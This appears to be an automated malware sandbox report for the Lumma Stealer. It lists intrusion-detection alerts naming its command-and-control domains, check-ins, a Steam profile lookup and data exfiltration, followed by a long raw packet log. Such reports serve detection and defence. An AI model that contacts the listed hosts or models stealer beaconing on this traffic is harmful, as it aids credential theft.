                                                                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                  2025-01-14T08:55:29.501594+01002059209ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)1192.168.2.7539261.1.1.153UDP
                                                                                                                                                                                                                                                  2025-01-14T08:55:29.512052+01002059189ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)1192.168.2.7604181.1.1.153UDP
                                                                                                                                                                                                                                                  2025-01-14T08:55:29.525032+01002059211ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)1192.168.2.7538531.1.1.153UDP
                                                                                                                                                                                                                                                  2025-01-14T08:55:29.536919+01002059201ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)1192.168.2.7508171.1.1.153UDP
                                                                                                                                                                                                                                                  2025-01-14T08:55:29.555067+01002059203ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)1192.168.2.7550201.1.1.153UDP
                                                                                                                                                                                                                                                  2025-01-14T08:55:29.565601+01002059199ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)1192.168.2.7637641.1.1.153UDP
                                                                                                                                                                                                                                                  2025-01-14T08:55:29.576398+01002059207ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)1192.168.2.7571221.1.1.153UDP
                                                                                                                                                                                                                                                  2025-01-14T08:55:29.590693+01002059191ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)1192.168.2.7639491.1.1.153UDP
                                                                                                                                                                                                                                                  2025-01-14T08:55:30.340433+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749784104.102.49.254443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:30.913240+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.749784104.102.49.254443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:31.723597+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749795188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:32.157732+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749795188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:32.157732+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749795188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:32.657578+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749801188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:33.142625+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749801188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:33.142625+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749801188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:34.216699+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749812188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:35.773469+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749825188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:36.313357+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749825188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:37.163604+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749838188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:38.722180+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749849188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:40.356462+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749860188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:40.360671+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.749860188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:42.730990+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749876188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:43.203229+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749876188.114.96.3443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:43.859968+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749883162.125.66.18443TCP
                                                                                                                                                                                                                                                  2025-01-14T08:55:45.745487+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749897162.125.66.15443TCP
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.620785952 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.620836973 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.620924950 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.673176050 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:29.673254013 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.340348005 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.340432882 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.345969915 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.345989943 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.346280098 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.396238089 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.460408926 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.507333994 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.913300991 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.913327932 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.913362980 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.913364887 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.913383961 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.913408041 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.913424969 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.913424969 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.913434029 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.913448095 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:30.913476944 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.005683899 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.005717039 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.005801916 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.005850077 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.005873919 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.005904913 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.010679960 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.010751963 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.010787964 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.010808945 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.010837078 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.010862112 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.054811954 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.054862022 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.054884911 CET49784443192.168.2.7104.102.49.254
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.054899931 CET44349784104.102.49.254192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.253655910 CET49795443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.253700972 CET44349795188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.253762960 CET49795443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.254210949 CET49795443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.254232883 CET44349795188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.723443985 CET44349795188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.723597050 CET49795443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.727725983 CET49795443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.727768898 CET44349795188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.728189945 CET44349795188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.731007099 CET49795443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.731033087 CET49795443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:31.731100082 CET44349795188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.157773018 CET44349795188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.158020020 CET44349795188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.158129930 CET49795443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.158339977 CET49795443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.158376932 CET44349795188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.158428907 CET49795443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.158443928 CET44349795188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.193411112 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.193449974 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.193525076 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.194006920 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.194025040 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.657506943 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.657577991 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.658723116 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.658729076 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.659053087 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.660096884 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.660121918 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:32.660187960 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.142713070 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.142848015 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.142905951 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.142929077 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.143014908 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.143058062 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.143066883 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.143222094 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.143266916 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.143275976 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.143378973 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.143426895 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.143434048 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.143503904 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.143549919 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.143558025 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.147272110 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.147325993 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.147334099 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.192991972 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.229351044 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.229521990 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.229572058 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.229592085 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.229754925 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.229824066 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.229953051 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.229969025 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.229994059 CET49801443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.230000019 CET44349801188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.760592937 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.760628939 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.760694981 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.761008024 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:33.761023045 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.216623068 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.216698885 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.217936993 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.217951059 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.218297005 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.219547987 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.219701052 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:34.219736099 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.031491041 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.031733036 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.031797886 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.031929970 CET49812443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.031949997 CET44349812188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.294579029 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.294624090 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.294698954 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.295000076 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.295016050 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.773395061 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.773468971 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.775234938 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.775247097 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.775595903 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.784928083 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.785116911 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.785161972 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.785240889 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:35.827337980 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.313369036 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.313513994 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.313718081 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.313944101 CET49825443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.313972950 CET44349825188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.703536034 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.703577995 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.703649998 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.703946114 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:36.703958988 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.163539886 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.163604021 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.165532112 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.165543079 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.165889025 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.174680948 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.174871922 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.174906015 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.174962044 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.174971104 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.771752119 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.771985054 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.772043943 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.772115946 CET49838443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:37.772139072 CET44349838188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.263803005 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.263860941 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.263972044 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.264408112 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.264426947 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.722069979 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.722179890 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.723931074 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.723949909 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.724278927 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.732178926 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.732260942 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:38.732270956 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.159260035 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.159372091 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.159446955 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.159542084 CET49849443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.159576893 CET44349849188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.897121906 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.897188902 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.897258043 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.897591114 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:39.897603035 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.356364965 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.356462002 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.357853889 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.357863903 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.358350992 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.359571934 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360233068 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360268116 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360371113 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360409021 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360513926 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360559940 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360780001 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360795975 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360925913 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.360949039 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.361150980 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.361177921 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.361186028 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.361299992 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.361320019 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.370786905 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.370970964 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.371006012 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.371016026 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.371037960 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.371171951 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.371206999 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.371211052 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.371222019 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.371275902 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.371300936 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:40.371387959 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.153749943 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.153963089 CET44349860188.114.96.3192.168.2.7
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.154064894 CET49860443192.168.2.7188.114.96.3
                                                                                                                                                                                                                                                  Jan 14, 2025 08:55:42.154181957 CET49860443192.168.2.7188.114.96.3
